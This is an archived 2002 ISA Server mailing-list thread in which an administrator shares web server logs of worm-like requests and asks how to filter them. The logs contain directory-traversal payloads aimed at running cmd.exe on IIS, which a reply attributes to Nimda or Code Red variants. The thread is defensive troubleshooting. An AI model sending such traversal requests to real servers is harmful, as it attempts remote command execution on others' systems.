For that I believe you need to publish thru web publishing, unfortunately. I suppose as long as your all Patched up with the latest hole fixes from MS, you should be ok. It would be nice to have ISA block them though. Mark ----- Original Message ----- From: "Greg Foulks" <greg.foulks@xxxxxxxx> To: "[ISAserver.org Discussion List]" <isalist@xxxxxxxxxxxxx> Sent: Saturday, March 02, 2002 1:43 PM Subject: [isalist] Re: Need help with filtering bogus webrequests through ISA http://www.ISAserver.org It is server published. Yeh I see it's blocking them on the webserver which is great and I'm not to worried about it at the moment. I would rather the request never made it to the webserver! greg ---------- Original Message ---------------------------------- From: "Mark Strangways" <strangconst@xxxxxxxxxx> Reply-To: "[ISAserver.org Discussion List]" <isalist@xxxxxxxxxxxxx> Date: Sat, 2 Mar 2002 13:27:17 -0500 >http://www.ISAserver.org > > >Those aren't good log's >They look allot like Nimbda and code red, this maybe a variant. >The good news is that your webserver is blocking them, but isa doesn't look >like it is. >Is your server web published or server published ?? > >Hope Jim will look into these as well :) He's the guru on this stuff :) > >Regards, > >Mark S >----- Original Message ----- >From: "Greg Foulks" <greg.foulks@xxxxxxxx> >To: "[ISAserver.org Discussion List]" <isalist@xxxxxxxxxxxxx> >Sent: Saturday, March 02, 2002 1:21 PM >Subject: [isalist] Need help with filtering bogus webrequests through ISA > > >http://www.ISAserver.org > > > >Can anyone give me some pointers that would help to eliminate >these bogus webrequests that are reaching my webservers running >behind an ISA server? > >2002-03-02 05:27:13 12.32.246.60 - W3SVC1 WEBKEEPER 10.0.0.32 80 >GET /scripts/root.exe /c+dir 404 2 3396 72 31 HTTP/1.0 www - - - >2002-03-02 05:27:13 12.32.246.60 - W3SVC1 WEBKEEPER 10.0.0.32 80 >GET /MSADC/root.exe /c+dir 403 5 3439 70 15 HTTP/1.0 www - - - >2002-03-02 05:27:13 12.32.246.60 - W3SVC1 WEBKEEPER 10.0.0.32 80 >GET /c/winnt/system32/cmd.exe /c+dir 404 3 3396 80 31 HTTP/1.0 >www - - - >2002-03-02 05:27:13 12.32.246.60 - W3SVC1 WEBKEEPER 10.0.0.32 80 >GET /d/winnt/system32/cmd.exe /c+dir 404 3 3396 80 32 HTTP/1.0 >www - - - >2002-03-02 05:27:13 12.32.246.60 - W3SVC1 WEBKEEPER 10.0.0.32 80 >GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 87 0 96 0 >HTTP/1.0 www - - - >2002-03-02 05:27:13 12.32.246.60 - W3SVC1 WEBKEEPER 10.0.0.32 80 >GET /_vti_bin/..%5c../..%5c../..% >5c../winnt/system32/cmd.exe /c+dir 404 3 3396 117 32 HTTP/1.0 www - > - - >2002-03-02 05:27:13 12.32.246.60 - W3SVC1 WEBKEEPER 10.0.0.32 80 >GET /_mem_bin/..%5c../..%5c../..% >5c../winnt/system32/cmd.exe /c+dir 404 3 3396 117 31 HTTP/1.0 www - > - - >2002-03-02 05:27:13 12.32.246.60 - W3SVC1 WEBKEEPER 10.0.0.32 80 >GET /msadc/..%5c../..%5c../..% >5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 5 3439 >145 15 HTTP/1.0 www - - - >2002-03-02 05:27:14 12.32.246.60 - W3SVC1 WEBKEEPER 10.0.0.32 80 >GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 123 0 97 15 >HTTP/1.0 www - - - >2002-03-02 05:27:14 12.32.246.60 - W3SVC1 WEBKEEPER 10.0.0.32 80 >GET /scripts/winnt/system32/cmd.exe /c+dir 404 3 3396 97 31 >HTTP/1.0 www - - - >2002-03-02 05:27:14 12.32.246.60 - W3SVC1 WEBKEEPER 10.0.0.32 80 >GET /winnt/system32/cmd.exe /c+dir 404 3 3396 97 31 HTTP/1.0 www - > - - >2002-03-02 05:27:14 12.32.246.60 - W3SVC1 WEBKEEPER 10.0.0.32 80 >GET /winnt/system32/cmd.exe /c+dir 404 3 3396 97 32 HTTP/1.0 www - > - - >2002-03-02 05:27:14 12.32.246.60 - W3SVC1 WEBKEEPER 10.0.0.32 80 >GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 87 0 98 0 >HTTP/1.0 www - - - >2002-03-02 05:27:14 12.32.246.60 - W3SVC1 WEBKEEPER 10.0.0.32 80 >GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 87 0 96 0 >HTTP/1.0 www - - - >2002-03-02 05:27:14 12.32.246.60 - W3SVC1 WEBKEEPER 10.0.0.32 80 >GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 87 0 100 0 >HTTP/1.0 www - - - >2002-03-02 05:27:14 12.32.246.60 - W3SVC1 WEBKEEPER 10.0.0.32 80 >GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 87 0 96 0 >HTTP/1.0 www - - - > >Thanks, >Greg > >________________________________________________________________ >Sent via the NewFound Technologies, Inc. - WebMail system at >mail.nfti.com > > > > > > >------------------------------------------------------ >You are currently subscribed to this ISAserver.org Discussion List as: >strangconst@xxxxxxxxxx >To unsubscribe send a blank email to leave-isalist- 373102A@xxxxxxxxxxxxx > > >------------------------------------------------------ >You are currently subscribed to this ISAserver.org Discussion List as: greg.foulks@xxxxxxxx >To unsubscribe send a blank email to leave-isalist- 373102A@xxxxxxxxxxxxx > ________________________________________________________________ Sent via the NewFound Technologies, Inc. - WebMail system at mail.nfti.com ------------------------------------------------------ You are currently subscribed to this ISAserver.org Discussion List as: strangconst@xxxxxxxxxx To unsubscribe send a blank email to $subst('Email.Unsub')